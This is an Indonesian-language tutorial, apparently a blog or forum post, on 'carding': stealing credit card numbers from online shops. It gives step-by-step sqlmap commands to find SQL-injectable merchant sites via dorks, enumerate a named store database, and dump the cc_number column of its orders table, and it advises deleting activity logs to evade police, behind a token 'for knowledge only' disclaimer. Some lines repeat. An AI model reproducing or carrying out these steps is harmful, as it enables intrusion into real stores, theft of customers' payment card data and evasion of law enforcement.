malam ini gwa posting mengenai Carding (pencurian kartu ATM) .gw share turo ini hanya untuk pengetahuan ya...!!! apabila kalian ketauan ama pihak berwajib tanggung sendiri akibatnya......klo ingin tidak ketauan lu apus aja log aktivitas lu agar nggak kelacak....udah deh basa-basinya...berikut cara-caranya:
alat2nya:
1.Sqli scanner 1 link 4shared
2.dork nya
Pertama ,ambil dork lalu scan menggunakan sqli scanner
Setelah itu kita test URL target dengan memberi kan tanda petik di belakang URL
http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat=268'
menjadi :
http://www.zite.com/merchandise/index.php?cat=268'
Nah, web tersebut error saat kita inject.
Kedua, kita eksekusi menggunakan sqlmap dengan perintah:
root@anonym:~# sqlmap -u http://www.target.com --dbs
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 --dbs
Kedua, kita eksekusi menggunakan sqlmap dengan perintah:
root@anonym:~# sqlmap -u http://www.target.com --dbs
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 --dbs
Disini kita mendapatkan 3 database :
root@anonym:~# sqlmap -u http://www.target.com -D namadatabase --tables (disini saya coba database "balboast_gkgcart")
[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table, dengan perintah:
Setelah itu kita dump database nya untuk mencari table, dengan perintah:
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart --tables
Nah, saya dapat tables nya.
Kita pilih di bagian "orders". Kita ambil columns nya, masukan perintah:
root@anonym:~# sqlmap.py -u http://www.target.com -D namadatabase -T namatable --columns
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns
Maka akan muncul database orders.
Nah, sudah muncul. Tinggal kita dump 1 per 1 columnsnya bro :)
Masukkan perintah:root@anonym:~# sqlmap.py -u link -D namadatabase -T namatable -C namakolom --dump
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders -C cc_number --dump
Maka nanti cc number akan muncul walau proses agak lama.